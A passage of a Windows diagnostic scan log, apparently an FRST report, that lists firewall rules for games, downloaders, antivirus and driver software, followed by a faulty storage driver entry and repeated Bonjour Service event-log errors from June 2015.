FirewallRules: [{16FE1655-5748-43EA-8EF7-62D5D470D143}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe
FirewallRules: [{6B6A5B11-6E60-4918-BA4B-C0BC68CF6EBC}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{56EE19A2-EC59-4D87-9792-175E4D24200A}] => (Allow) C:\Program Files (x86)\HP\digital imaging\smart web printing\smartwebprintexe.exe
FirewallRules: [{29BA2F73-10F1-4F1B-95E6-7958659A8CDE}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [{ADDD1CE0-BA42-45F3-90A6-2E9EC17F01AB}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.954\Agent.exe
FirewallRules: [{CB548BC7-3B70-4FC3-841A-0808A6569AFB}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.954\Agent.exe
FirewallRules: [{A8814AD0-3FED-474C-9B97-BF86DEEABA51}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1267\Agent.exe
FirewallRules: [{56AF557C-4F6D-448E-A935-AC0E895FD60E}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1267\Agent.exe
FirewallRules: [{6A80827D-DE6F-427C-BEA3-790F2FD8C0EE}] => (Allow) C:\Windows\SysWOW64\ZoneLabs\vsmon.exe
FirewallRules: [{8AC037B0-5DCE-4C3C-B760-832580B1477D}] => (Allow) C:\Windows\SysWOW64\ZoneLabs\vsmon.exe
FirewallRules: [TCP Query User{10436D1A-E563-4628-A2B7-07712D307DFC}C:\program files (x86)\warframe\downloaded\public\warframe.x64.exe] => (Allow) C:\program files (x86)\warframe\downloaded\public\warframe.x64.exe
FirewallRules: [UDP Query User{7A72C5E7-9695-489E-8610-AC0F9FACB548}C:\program files (x86)\warframe\downloaded\public\warframe.x64.exe] => (Allow) C:\program files (x86)\warframe\downloaded\public\warframe.x64.exe
FirewallRules: [{CC673508-B3EC-4E77-A174-7D251B462B27}] => (Allow) C:\Program Files (x86)\AVG\AVG2013\avgmfapx.exe
FirewallRules: [{EA2BDF68-DB8C-4E08-A724-24063BB2A7DE}] => (Allow) C:\Program Files (x86)\AVG\AVG2013\avgmfapx.exe
FirewallRules: [{870367D9-C4A7-4C03-8979-3DC8D46BEA26}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{F867F6A8-54D5-48AA-BFDB-180B010CBBF4}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{549A62EA-00BE-425D-B330-33FEB6C2799C}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{8431BD98-36D3-4F20-B8A6-847F3913C5AC}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{5EC99044-B6EA-4EBA-BEDC-47E290E0B096}] => (Allow) C:\Program Files (x86)\GamersFirst\APB Reloaded\Binaries\APB.exe
FirewallRules: [{67689577-C62A-4E6C-863D-D2827CB242ED}] => (Allow) C:\Program Files (x86)\GamersFirst\APB Reloaded\Binaries\APB.exe
FirewallRules: [{A680CE4A-B58A-4076-8639-09EF19F6EDD6}] => (Allow) C:\Program Files (x86)\GamersFirst\APB Reloaded\Binaries\VivoxVoiceService.exe
FirewallRules: [{CBE08D72-C591-4470-A190-168F051DD66C}] => (Allow) C:\Program Files (x86)\GamersFirst\APB Reloaded\Binaries\VivoxVoiceService.exe
FirewallRules: [{AEDF559F-3FF6-4D6F-8F4F-33DC61DAF73A}] => (Allow) LPort=49813
FirewallRules: [{3FDE6857-DFAE-4053-8E3F-66D8F54BA13B}] => (Allow) LPort=5000
FirewallRules: [{901B1144-973F-4E78-881E-74E380CFE3C3}] => (Allow) C:\Users\User\AppData\Local\Google\Google Talk Plugin\googletalkplugin.exe
FirewallRules: [{87D84A08-7FF5-4461-967A-F577348BC396}] => (Allow) C:\Users\User\AppData\Local\Google\Google Talk Plugin\googletalkplugin.exe
FirewallRules: [{DEA6C2EF-FAFD-4147-BA4A-07A3C02E43FE}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{9419C295-914A-43B7-A4C2-EB9C55AF0313}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{64666CDB-E1BE-4FFF-99C8-89CA9D1228CD}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{65A26E14-6078-483E-8902-FCF1CC4655C5}] => (Allow) LPort=2869
FirewallRules: [{1C5D92BA-A85D-42FE-9EFB-BE6B7B7B5349}] => (Allow) LPort=1900
FirewallRules: [{6ED9AA69-96C2-4DD8-BC1F-0AC547298FC8}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2045\Agent.exe
FirewallRules: [{D43DA202-A7AA-4F2B-A76A-9DE59B68E97A}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2045\Agent.exe
FirewallRules: [{C96F75BB-8DA3-43F8-A136-BF92B59DFAB2}] => (Allow) C:\Program Files (x86)\Diablo III\Diablo III.exe
FirewallRules: [{06D7A7AA-B1CC-460B-8114-B25C6D6C24AD}] => (Allow) C:\Program Files (x86)\Diablo III\Diablo III.exe
FirewallRules: [{AADD4903-8649-4823-9805-58D60F039C0F}] => (Allow) C:\Program Files (x86)\Logitech\Vid HD\Vid.exe
FirewallRules: [{D8DE1630-740F-46D7-95F6-CD8D88DB6EA8}] => (Allow) C:\Program Files (x86)\Logitech\Vid HD\Vid.exe
FirewallRules: [{B61545D9-8A62-4FEB-9A08-F6A2B26EFC2E}] => (Allow) C:\ProgramData\Tiancity\NGM\NGM.exe
FirewallRules: [{A23ED0E0-697B-4AF7-9817-656E1711C298}] => (Allow) C:\ProgramData\Tiancity\NGM\NGM.exe
FirewallRules: [{9958BC42-A520-4717-BA84-59EA7D635AA0}] => (Allow) C:\Program Files (x86)\Tiancity\Heroes-CN\zh-CN\NMService.exe
FirewallRules: [{E38CE316-7337-4A18-B46B-41364B46B10A}] => (Allow) C:\Program Files (x86)\Tiancity\Heroes-CN\zh-CN\NMService.exe
FirewallRules: [TCP Query User{055DD932-E0DA-4FC0-AD53-CE8D8851C527}C:\program files (x86)\tiancity\heroes-cn\zh-cn\heroes.exe] => (Allow) C:\program files (x86)\tiancity\heroes-cn\zh-cn\heroes.exe
FirewallRules: [UDP Query User{66DC22DD-3096-4DE1-B6EE-2638682F290A}C:\program files (x86)\tiancity\heroes-cn\zh-cn\heroes.exe] => (Allow) C:\program files (x86)\tiancity\heroes-cn\zh-cn\heroes.exe
FirewallRules: [TCP Query User{D4CFFC98-1773-4C22-8DAF-C49717EFDD92}C:\program files (x86)\videolan\vlc\vlc.exe] => (Block) C:\program files (x86)\videolan\vlc\vlc.exe
FirewallRules: [UDP Query User{CBA5C55A-B850-4AE2-B2D8-EF509C895EC9}C:\program files (x86)\videolan\vlc\vlc.exe] => (Block) C:\program files (x86)\videolan\vlc\vlc.exe
FirewallRules: [{9B587A98-A2AD-4BE2-BD1B-866DBF50BE66}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Team Fortress 2\hl2.exe
FirewallRules: [{18E4FA58-76FC-445A-B5B4-2527E9203CAB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Team Fortress 2\hl2.exe
FirewallRules: [{5A8019BD-2D80-4341-9A84-D9B1D073EB36}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{440E90EB-1C2D-4DEB-BB66-63257037191C}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{3946F4BE-3FF6-4110-BF5E-BE82F5CAFDF9}] => (Allow) C:\Users\User\AppData\Local\Temp\QQVipDownloader\dnf_1396002792\QQVipDownloader.exe
FirewallRules: [{6C2C97E9-7D68-4598-A115-658386F8DCF0}] => (Allow) C:\Users\User\AppData\Local\Temp\QQVipDownloader\dnf_1396002792\QQVipDownloader.exe
FirewallRules: [{3EA1DB07-A836-4322-BD3D-4AFFE35D484C}] => (Allow) C:\Users\User\AppData\Local\Temp\QQVipDownloader\dnf_1396002792\bugreport.exe
FirewallRules: [{C8FEF9D4-2B63-4B2A-A622-1368394836BE}] => (Allow) C:\Users\User\AppData\Local\Temp\QQVipDownloader\dnf_1396002792\bugreport.exe
FirewallRules: [TCP Query User{5808182F-DBBD-4B5B-8C36-EC034B99AA36}C:\program files (x86)\common files\tencent\qqvipdownloader\124\tencentdl.exe] => (Allow) C:\program files (x86)\common files\tencent\qqvipdownloader\124\tencentdl.exe
FirewallRules: [UDP Query User{EA9E0DA8-4750-46E2-9D69-D7A0E8C0E86E}C:\program files (x86)\common files\tencent\qqvipdownloader\124\tencentdl.exe] => (Allow) C:\program files (x86)\common files\tencent\qqvipdownloader\124\tencentdl.exe
FirewallRules: [TCP Query User{2A6B15D7-CCD4-436D-BE93-C7D06553ACFA}C:\program files\ìúñ¶óîï·\µøïâ³çóëóâê¿\tcls\tenprotect\tensafe_1.exe] => (Allow) C:\program files\ìúñ¶óîï·\µøïâ³çóëóâê¿\tcls\tenprotect\tensafe_1.exe
FirewallRules: [UDP Query User{1E95FBEC-C1A1-4DCB-87C9-B3D158BF326D}C:\program files\ìúñ¶óîï·\µøïâ³çóëóâê¿\tcls\tenprotect\tensafe_1.exe] => (Allow) C:\program files\ìúñ¶óîï·\µøïâ³çóëóâê¿\tcls\tenprotect\tensafe_1.exe
FirewallRules: [{1F8C3F7D-C24D-40A4-AA67-92E65B09F16A}] => (Allow) c:\program files\ÌÚѶÓÎÏ·\µØϳÇÓëÓÂÊ¿\tcls\client.exe
FirewallRules: [{6E342875-7980-4D61-B50B-95F9506D4B91}] => (Allow) c:\program files\ÌÚѶÓÎÏ·\µØϳÇÓëÓÂÊ¿\tcls\client.exe
FirewallRules: [{CBCF09D3-C35A-46B1-A1D9-7BB71A5706E9}] => (Allow) c:\users\user\appdata\roaming\tencent\地下城与勇士\4931a2b10fd24aa9eb3ec157cebf3ad0\teniodl\teniodl.exe
FirewallRules: [{845913BE-754F-4AA5-9634-F44C539DC99D}] => (Allow) c:\users\user\appdata\roaming\tencent\地下城与勇士\4931a2b10fd24aa9eb3ec157cebf3ad0\teniodl\teniodl.exe
FirewallRules: [{EB6B8155-E131-484E-AABB-8865DC7190D4}] => (Allow) C:\Users\User\AppData\Local\Temp\PCMng\EXPlugins\QQPCDetectorGeneral.exe
FirewallRules: [{81381B9B-E5CC-46BD-A518-3CF670A6CDC2}] => (Allow) C:\Users\User\AppData\Local\Temp\PCMng\EXPlugins\QQPCDetectorGeneral.exe
FirewallRules: [TCP Query User{510661DD-AADA-4ED5-A611-3E4FF34498AA}C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\tenprotect\tensafe_1.exe] => (Allow) C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\tenprotect\tensafe_1.exe
FirewallRules: [UDP Query User{3DD44DF5-FBCC-40DD-A603-C1C14E247A5B}C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\tenprotect\tensafe_1.exe] => (Allow) C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\tenprotect\tensafe_1.exe
FirewallRules: [{285E89AF-8454-4E27-8FBF-09921B3549C5}] => (Allow) c:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\client.exe
FirewallRules: [{C7359D09-E8AE-486B-88FF-31D12CD6E9CD}] => (Allow) c:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\client.exe
FirewallRules: [{49DB99CE-0756-4E3A-B20B-FF5CA514AE90}] => (Allow) c:\users\user\appdata\roaming\tencent\地下城与勇士\a25f34849154599b26818479e72173fe\teniodl\teniodl.exe
FirewallRules: [{510FFA92-9DD6-4AF6-AE90-37958F7E59D1}] => (Allow) c:\users\user\appdata\roaming\tencent\地下城与勇士\a25f34849154599b26818479e72173fe\teniodl\teniodl.exe
FirewallRules: [{101BDB56-7ED3-4AF0-9149-3EBDED7F35F7}] => (Allow) C:\Program Files (x86)\Common Files\Tencent\QQDownload\119\Tencentdl.exe
FirewallRules: [{DFFBF44E-5996-4377-90BB-3E1988EEACA9}] => (Allow) C:\Program Files (x86)\Common Files\Tencent\QQDownload\119\Tencentdl.exe
FirewallRules: [{B66BDF77-1F7F-4FAB-8363-60D48B2C1186}] => (Allow) c:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\client.exe
FirewallRules: [{0A261730-EF11-4141-9814-142D8A2E9830}] => (Allow) c:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\client.exe
FirewallRules: [{709488E4-764E-43A4-AA0D-59B36254B831}] => (Allow) c:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\client.exe
FirewallRules: [{4EF98A41-120F-4463-8A6D-025BBA43D857}] => (Allow) c:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\client.exe
FirewallRules: [{3B534597-EDFB-4F7E-84F2-9F92F5B7E3FB}] => (Allow) c:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\client.exe
FirewallRules: [{3790B88F-899E-4EA1-B739-56F366402E9B}] => (Allow) c:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\client.exe
FirewallRules: [TCP Query User{5EA33C0F-E4B5-4FB8-8CC4-A367EC93908F}C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\tenprotect\taslogin.exe] => (Allow) C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\tenprotect\taslogin.exe
FirewallRules: [UDP Query User{E7A6DD1A-523F-4A51-81FF-89754C57306D}C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\tenprotect\taslogin.exe] => (Allow) C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\tenprotect\taslogin.exe
FirewallRules: [TCP Query User{5A748A0D-ECEC-40B9-90D4-C0DDEC8BBA4E}C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\repair.exe] => (Allow) C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\repair.exe
FirewallRules: [UDP Query User{126C89EB-6208-47E2-84DD-88ACB8E2D6BC}C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\repair.exe] => (Allow) C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\repair.exe
FirewallRules: [{C9059BBA-AC9B-40ED-8DC2-3752ED2C3F29}] => (Allow) C:\Program Files\ìúó·\μ3óóê\tcls\地下城与勇士\start\Cross\CrossProxy.exe
FirewallRules: [{FA449A1E-6748-451A-971F-32E841B30A6B}] => (Allow) C:\Program Files\ìúó·\μ3óóê\tcls\地下城与勇士\start\Cross\CrossProxy.exe
FirewallRules: [TCP Query User{F04EE6CE-8066-46C6-8405-B95D41E64B2B}C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\dnf.exe] => (Allow) C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\dnf.exe
FirewallRules: [UDP Query User{0017A2EB-3E89-4035-93B1-9687034C28FD}C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\dnf.exe] => (Allow) C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\dnf.exe
FirewallRules: [{45A488FF-6339-4BF2-8EF5-4448A892EFDF}] => (Allow) C:\Users\User\AppData\Local\Temp\QQVipDownloader\dnf_1399488507\QQVipDownloader.exe
FirewallRules: [{9C2ABAE1-9CF1-4046-8D3A-C15D46170216}] => (Allow) C:\Users\User\AppData\Local\Temp\QQVipDownloader\dnf_1399488507\QQVipDownloader.exe
FirewallRules: [{DEA059DB-EAA1-4ED4-B94B-007EFE5FBD4E}] => (Allow) C:\Users\User\AppData\Local\Temp\QQVipDownloader\dnf_1399488507\bugreport.exe
FirewallRules: [{00A82D24-9F6C-4382-9DA0-994557C5E414}] => (Allow) C:\Users\User\AppData\Local\Temp\QQVipDownloader\dnf_1399488507\bugreport.exe
FirewallRules: [{C69EAC2F-7E19-429E-8C65-EDA57AC6B8AC}] => (Allow) C:\program files (x86)\common files\tencent\qqvipdownloader\124\tencentdl.exe
FirewallRules: [TCP Query User{282DBCC6-64DD-4F57-A55B-D7ACE175D03E}C:\program files (x86)\dfo\dfo.exe] => (Allow) C:\program files (x86)\dfo\dfo.exe
FirewallRules: [UDP Query User{DFBBC824-7DC2-4ACD-9FC1-8F8FCE06A426}C:\program files (x86)\dfo\dfo.exe] => (Allow) C:\program files (x86)\dfo\dfo.exe
FirewallRules: [{BDF15738-4A4A-4E31-8594-5B169CA2E244}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2787\Agent.exe
FirewallRules: [{BB746DE5-7E11-4DEF-8173-B642E8D072A0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2787\Agent.exe
FirewallRules: [{EDF61CCB-54EF-416B-A5C8-7B81C22A94C6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{79904360-907C-4542-AF5F-C8814E0EA659}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{450E8B5D-7EB2-46CC-AA14-CE9DE6C3488C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{91118A5A-2726-436D-B42A-481BC284C08B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{4FD8BA16-4C44-41F1-925B-0916CC7800B1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{EF6682F7-C06D-42A8-B6C6-0B4574C26163}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{93B673FF-6404-4CFE-BE78-60F58918140D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{326B3AC6-3E7F-4F7D-94FC-2912BBD8777F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{08D921E3-2F25-4C4F-A52B-66487052FC98}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{7E6B017A-A342-4887-A0DB-D75F791AC4A6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\RemoteCrashSender.exe
FirewallRules: [{603ADC81-FE0F-44B2-AA3A-DC4F712D6A26}] => (Allow) C:\Program Files (x86)\AVG\AVG2014\avgmfapx.exe
FirewallRules: [{8A4704F4-D268-4A44-B01D-1EB76A46CDC3}] => (Allow) C:\Program Files (x86)\AVG\AVG2014\avgmfapx.exe
FirewallRules: [{105A8B80-52A4-41D4-A74E-A4786FDA2E18}] => (Allow) C:\Users\User\AppData\Local\Facebook\Video\Skype\FacebookVideoCalling.exe
FirewallRules: [{FE6BD1B5-C0FD-407C-9CF3-7BF95F931D54}] => (Allow) C:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.exe
FirewallRules: [{5C0ADC1A-F1C1-4166-97AD-C7850B3D0F08}] => (Allow) C:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{5398E0BD-7C15-40A1-B9E5-7DE339049EC4}] => (Allow) C:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.exe
FirewallRules: [{0AFBF510-925D-4A74-928D-1DBB02624BC9}] => (Allow) C:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{01C1A6E3-4DBC-44F4-93E3-D905547A769E}] => (Allow) C:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.exe
FirewallRules: [{D5D92FE4-FABA-4494-8DA9-802770F88761}] => (Allow) C:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{FE500B52-878D-4BA5-93A0-2ABAD045B239}] => (Allow) C:\Users\User\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe
FirewallRules: [{B6A82BFE-D8F3-420B-8F8D-58514862BFF0}] => (Allow) C:\Users\User\AppData\Local\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe
FirewallRules: [{B0F0B09F-010B-4D15-972B-6B5AC8D05EBB}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3023\Agent.exe
FirewallRules: [{D3A4F4B0-8039-4827-A2AC-1E22623E5282}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3023\Agent.exe
FirewallRules: [{EF01B346-283E-46AB-B2B5-F18C5501C401}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
FirewallRules: [{6A039867-FB72-456F-B946-86DA65760300}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
FirewallRules: [{3159542D-03FF-4482-A47E-5B52E78C2FC1}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{7376FF97-4068-4E5C-9158-AC3A6D60F999}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [TCP Query User{1A18223C-45B1-4200-99A1-AB4D08ED23C5}C:\users\user\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\user\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{4C6AD108-ABB4-41BC-8D08-1C4C1FE7092E}C:\users\user\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\user\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{1103FFE6-BA5C-487B-9362-53CC00BD5492}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{6828B87A-23E3-498D-91FA-8AA1117ED041}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{7620D19F-2067-4C28-A67B-5A78C2CBC0B2}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{2DE231AC-481B-43A3-9319-B706D32E5BFE}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{B1AC3814-3819-4B74-9D13-5BD20CCC8438}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe
FirewallRules: [{6932886C-DE76-41E6-9DF0-290AC06B7BCE}] => (Allow) C:\Program Files (x86)\Mobogenie3\mobogenieP2sp.exe
FirewallRules: [{96CF4AD1-7809-4838-8A1A-0968D27B167F}] => (Allow) C:\Program Files (x86)\Mobogenie3\mobogenieP2sp.exe
FirewallRules: [{CDDE25C5-1F11-464D-986D-380B4AC6215B}] => (Allow) C:\Program Files (x86)\Mobogenie3\mobogenieP2sp.exe
FirewallRules: [{CBDA4D54-E7B8-46AC-A163-E9B8970CD8E5}] => (Allow) C:\Program Files (x86)\Mobogenie3\mobogenieP2sp.exe
FirewallRules: [{9D1E9011-887F-4875-8AF3-66B963295B59}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A1D511BB-176A-4E24-A3C9-206C2864D7D9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{0F96295C-AB41-422D-A5BA-10E20D4E72DD}] => (Allow) LPort=18577
FirewallRules: [{B77C271A-45AD-48B5-9319-228F2F448690}] => (Allow) LPort=18577
FirewallRules: [{9B7B11B8-6D0D-4C91-9B1F-89405E1D3CD0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Rise_of_Incarnates\exe\roi.exe
FirewallRules: [{95ECC3A7-7F1F-499C-B3A7-79DEDC462D1E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Rise_of_Incarnates\exe\roi.exe
FirewallRules: [{8EFACEED-73DB-46AE-920C-BCBF254F47B0}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{71373431-1020-4F1F-BF6B-56BE2279B166}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{45B39B28-4D7D-4144-95DC-21111DC695FD}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{1A0DA08D-C440-42D3-B61C-A3DDD6FD446E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{F2873B20-D511-40DB-88CA-284BDB9E7C9A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{799E9283-0D7B-471B-B8EC-EFCB0AEAFD41}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [TCP Query User{CD511736-7346-46BA-B176-D62D4607129F}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{1EAE3DC8-1B44-4AD4-BA2D-6FE5D05F36D8}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [TCP Query User{D72917AF-0480-404F-839B-530B374A4681}C:\neople\dfo\dfo.exe] => (Allow) C:\neople\dfo\dfo.exe
FirewallRules: [UDP Query User{8F5483E6-CC20-4C32-B41F-281693D5697E}C:\neople\dfo\dfo.exe] => (Allow) C:\neople\dfo\dfo.exe
FirewallRules: [{5E6C5DE6-BE55-4823-ACF4-4B109B8430EF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\nosgoth\Binaries\Win32\Nosgoth.exe
FirewallRules: [{F0AFBB80-7C0A-4005-91C6-CD00CCE8B9CB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\nosgoth\Binaries\Win32\Nosgoth.exe
FirewallRules: [{CA28D311-C31E-48A7-81AE-E7CF8256790D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\nosgoth\Binaries\Win32\Nosgoth.exe
FirewallRules: [{2279626D-853A-41F9-837E-3EF1340085FF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\nosgoth\Binaries\Win32\Nosgoth.exe
FirewallRules: [{9480D24E-B45D-4281-AEAB-3D191A6E1CAA}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe
FirewallRules: [{797D64E1-9CC1-40D4-8766-31DA511A9142}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe
FirewallRules: [{542E2A88-B8F8-4F02-A6D4-520F03F3827C}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{C6E27419-86C8-4D41-AE32-8CE85C6EEE48}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
FirewallRules: [{AA3DCB43-1EB9-4D06-8FFB-EA77EF4B4225}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
FirewallRules: [{7D9A9E8A-DD1C-4777-A7D8-13E3FEE02E20}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgdiagex.exe
FirewallRules: [{698B2CF0-3E1F-455E-B9C9-ADCD018EFEFD}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgdiagex.exe
FirewallRules: [{FA781394-8014-45DB-B7F4-90280B5A5FE7}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
FirewallRules: [{6E4DCDBE-CA92-4B65-9884-327C8CD3CF26}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\FlashGet Network\FlashGet 3\FlashGet3.exe] => Enabled:Flashget3
StandardProfile\AuthorizedApplications: [C:\Nexon\Combat Arms\CombatArms.exe] => :*Enabled:CombatArms.exe
StandardProfile\AuthorizedApplications: [C:\Nexon\Combat Arms\Engine.exe] => :*Enabled:Engine.exe

==================== Faulty Device Manager Devices =============

Name:
Description:
Class Guid: {4D36E97B-E325-11CE-BFC1-08002BE10318}
Manufacturer: (Standard mass storage controllers)
Service: az2rivpn
Problem: : Windows cannot load the device driver for this hardware. The driver may be corrupted or missing. (Code 39)
Resolution: Reasons for this error include a driver that is not present; a binary file that is corrupt; a file I/O problem, or a driver that references an entry point in another binary file that could not be loaded.
Uninstall the driver, and then click "Scan for hardware changes" to reinstall or upgrade the driver.


==================== Event log errors: =========================

Application errors:
==================
Error: (06/28/2015 11:08:23 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (06/28/2015 11:08:22 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 479672

Error: (06/28/2015 11:08:22 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 479672

Error: (06/28/2015 11:08:22 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (06/28/2015 11:08:21 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 478673

Error: (06/28/2015 11:08:21 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 478673

Error: (06/28/2015 11:08:21 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (06/28/2015 11:08:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 477675

Error: (06/28/2015 11:08:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
